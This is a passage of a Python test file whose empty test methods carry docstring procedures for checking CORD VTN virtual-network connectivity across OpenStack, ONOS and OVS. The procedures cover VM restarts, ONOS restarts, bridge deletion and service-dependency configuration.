8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
10) Now ping from VM which is Net-A to other VM which is in Net-B, should not ping.
11) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_floating_IP_with_vlan_connectivity_networks_and_boot_images_in_different_service_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetB with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
(neutron port-create net-B-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
10) Now ping from VM which is Net-A to other VM which is in Net-B, should not ping.
11) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_for_services_dependency_with_out_xos_direct_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push service dependency data.json file to onos to subscriber of other service.
$ curl -X POST -H "Content-Type: application/json" -u onos:rocks -d @data.json http://$OC1:8181/onos/cordvtn/serviceNetworks
4) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetBwith an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till VMs boot up and running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from VM which is Net-A to other VM which is in Net-B, should ping.
12) Verify that flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_for_services_dependency_with_out_xos_indirect_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push service dependency data.json file to onos to subscriber of other service.
$ curl -X POST -H "Content-Type: application/json" -u onos:rocks -d @data.json http://$OC1:8181/onos/cordvtn/serviceNetworks
4) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetBwith an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till VMs boot up and running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from VM which is Net-B to other VM which is in Net-A, capture packets on port for ICMP request packets.
12) Verify that flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_remove_services_dependency_with_out_xos_direct_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push service dependency data.json file to onos to subscriber of other service.
$ curl -X POST -H "Content-Type: application/json" -u onos:rocks -d @data.json http://$OC1:8181/onos/cordvtn/serviceNetworks
4) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetBwith an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till VMs boot up and running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from VM which is Net-A to other VM which is in Net-B, should ping.
12) Verify that flows are being added in the OVS switch.
13) Push config data with outservice dependency in data.json file to onos to subscriber of other service.
14) Now ping from VM which is Net-A to other VM which is in Net-B, should not ping.
15) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_remove_services_dependency_with_out_xos_indirect_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push service dependency data.json file to onos to subscriber of other service.
$ curl -X POST -H "Content-Type: application/json" -u onos:rocks -d @data.json http://$OC1:8181/onos/cordvtn/serviceNetworks
4) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetBwith an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till VMs boot up and running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from VM which is Net-B to other VM which is in Net-A, capture packets on port for ICMP request packets.
12) Verify that flows are being added in the OVS switch.
13) Push config data with out service dependency in data.json file to onos to subscriber of other service.
14) Now ping from VM which is Net-B to other VM which is in Net-A, should not see any ICMP request packets on port.
15) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_for_services_dependency_with_xos_direct_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Validate that XOS is up and running.
4) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetBwith an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till VMs boot up and running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from VM which is Net-A to other VM which is in Net-B, should ping.
12) Verify that flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_for_services_dependency_with_xos_indirect_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Validate that XOS is up and running.
4) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetBwith an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till VMs boot up and running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from VM which is Net-B to other VM which is in Net-A, should ping.
12) Verify that flows are being added in the OVS switch.
"""
pass
def test_cordvtn_with_access_agent_serviceType_and_vtn_location_field_network_cfg_connectivity_to_access_device(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push access-agent additional network_cfg to ONOS and specify vtn-location field info must be access-agent container.
4) Launch the access-agent and access-device containers and then restart openstack compute node.
$ sudo docker run --privileged --cap-add=ALL -d --name access-agent -t ubuntu:14.04 /bin/bash
5) Create each interface on br-int and br-mgmt using pipework on access-agent containers
$ sudo ./pipework br-mgmt -i eth1 access-agent 10.10.10.20/24
$ sudo ./pipework br-int -i eth2 access-agent 10.168.0.100/24 fa:00:00:00:00:11
6) We ahve to stop ONOS service to test this
onos-service stop
sudo ovs-ofctl -O OpenFlow13 del-flows br-int "arp"
7) Now attach to access-agent container and ping to access-device
8) Verify that ping should be success and flows are being added in br-int.
"""
pass
def test_cordvtn_with_access_agent_serviceType_and_vtn_location_field_in_network_cfg_connectivity_to_head_node(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push access-agent additional network_cfg to ONOS and specify vtn-location field info must be access-agent container.
4) Launch the access-agent and access-device containers and then restart openstack compute node.
$ sudo docker run --privileged --cap-add=ALL -d --name access-agent -t ubuntu:14.04 /bin/bash
5) Create each interface on br-int and br-mgmt using pipework on access-agent containers
$ sudo ./pipework br-mgmt -i eth1 access-agent 10.10.10.20/24
$ sudo ./pipework br-int -i eth2 access-agent 10.168.0.100/24 fa:00:00:00:00:11
6) We ahve to stop ONOS service to test this
onos-service stop
sudo ovs-ofctl -O OpenFlow13 del-flows br-int "arp"
7) Now attach to access-agent container and ping to head node
8) Verify that ping should be success and flows are being added in br-int.
"""
pass
def test_cordvtn_with_access_agent_serviceType_and_invalid_vtn_location_field_network_cfg_connectivity_to_access_device(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push access-agent additional network_cfg to ONOS and specify vtn-location field info must not be access-agent container.
4) Launch the access-agent and access-device containers and then restart openstack compute node.
$ sudo docker run --privileged --cap-add=ALL -d --name access-agent -t ubuntu:14.04 /bin/bash
5) Create each interface on br-int and br-mgmt using pipework on access-agent containers
$ sudo ./pipework br-mgmt -i eth1 access-agent 10.10.10.20/24
$ sudo ./pipework br-int -i eth2 access-agent 10.168.0.100/24 fa:00:00:00:00:11
6) We ahve to stop ONOS service to test this
onos-service stop
sudo ovs-ofctl -O OpenFlow13 del-flows br-int "arp"
7) Now attach to access-agent container and ping to access-device
8) Verify that ping should not be success and no flows are being added in br-int.
"""
pass
def test_cordvtn_with_access_agent_serviceType_and_invalid_vtn_location_field_in_network_cfg_connectivity_to_head_node(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push access-agent additional network_cfg to ONOS and specify vtn-location field info must not be access-agent container.
4) Launch the access-agent and access-device containers and then restart openstack compute node.
$ sudo docker run --privileged --cap-add=ALL -d --name access-agent -t ubuntu:14.04 /bin/bash
5) Create each interface on br-int and br-mgmt using pipework on access-agent containers
$ sudo ./pipework br-mgmt -i eth1 access-agent 10.10.10.20/24
$ sudo ./pipework br-int -i eth2 access-agent 10.168.0.100/24 fa:00:00:00:00:11
6) We ahve to stop ONOS service to test this
onos-service stop
sudo ovs-ofctl -O OpenFlow13 del-flows br-int "arp"
7) Now attach to access-agent container and ping to head node
8) Verify that ping should not be success and no flows are being added in br-int.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service_connectivity_after_restarting_VMs(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart both VMs in same service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service_connectivity_after_restarting_cord_onos(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart ONOS service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service_connectivity_after_delete_any_VM_recreating_it(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete a VM which was created earlier and repeat steps 4 to 11.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service_connectivity_after_delete_and_add_br_int_bridge(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete a br_int bridge and repeat steps 7 to 11, (it should not ping)
13) Add br_int bridge and repeat steps 7 to 11, (it should ping)
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity_after_restarting_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from outside network which are internet network (global ping)
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart the VM in service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity_after_restarting_cord_onos(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from outside network which are internet network (global ping)
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart onos service container and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity_after_delete_and_recreate_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from outside network which are internet network (global ping)
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete and re-create a VM in the same service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity_after_delete_and_add_br_int_bridge(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from outside network which are internet network (global ping)
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete a br_int bridge and repeat steps 7 to 11, (it should not ping)
13) Add br_int bridge and repeat steps 7 to 11, (it should ping)
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity_after_restarting_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from compute node network which are launched a VM.
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart the VM in service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity_after_restarting_cord_onos(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from compute node network which are launched a VM.
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart the onos service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity_after_delete_and_recreate_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from compute node network which are launched a VM.
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete and re-create a VM in the same service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity_after_delete_and_add_br_int_bridge(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from compute node network which are launched a VM.
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Delete a br_int bridge and repeat steps 7 to 11, (it should not ping)
13) Add br_int bridge and repeat steps 7 to 11, (it should ping)
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_local_management_network_and_boot_image_connectivity_after_restarting_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management ip on VM.
8) Create a same virtual interface with valn tag and any local management ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Restart the VM in service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_local_management_network_and_boot_image_connectivity_after_restarting_cord_onos(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management ip on VM.
8) Create a same virtual interface with valn tag and any local management ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Restart the ONOS service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_local_management_network_and_boot_image_connectivity_after_delete_and_recreate_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management ip on VM.
8) Create a same virtual interface with valn tag and any local management ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Delete and re-create a VM in service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_local_management_network_and_boot_image_connectivity_after_delete_and_add_br_int_bridge(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
